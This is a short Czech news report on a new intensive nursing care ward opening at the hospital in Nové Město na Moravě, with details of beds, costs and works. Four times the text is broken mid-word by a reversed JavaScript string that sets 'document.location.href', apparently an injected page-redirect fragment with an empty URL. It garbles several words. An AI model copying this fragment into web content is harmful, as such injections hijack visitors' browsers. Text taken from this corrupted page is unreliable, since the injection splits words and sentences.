Rainbow page separator

Nové oddělení nemocnice je připraveno přijmout první pacienty

Neděle, 24. listopadu 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nové nemocniční oddělení dlouhodobé intenzivní ošetřovatelské péče (DIOP), které je součástí oddělení dlouhodobě nemocných 1, zahajuje provoz. Pro pacienty je připraveno pět pokojů s celkem osmi lůžky. „Oddělení DIOP je určeno pacientům, u kterých již pominuly důvody hospitalizace na jednotce intenzivní péče nebo následné intenzivní péče, již nevyžadují kontinuální lékařskou péči, ale nemohou být propuštěni do domácí péče a současně potřebují soustavnou intenzivní ošetřovatelskou péči. Na těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lůžkách je také posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována intenzivní péče pacientům s poruchou základních životních funkcí,“ vysvětlila ředitelka nemocnice Věra Palečková.
Stavební úpravy byly zahájeny na konci září, přestavba nemocnici vyšla na 1,2 milionu korun bez DPH. „Práce zahrnovaly kromě potřebných úprav vybudování nové elektroinstalace, nových rozvodů medicinálních plynů. Oddělení má nové elektrostatické podlahy. Doplněná je samozřejmě také příslušná přístrojová technika,“ sdělil technický náměstek nemocnice Jiří Drdla.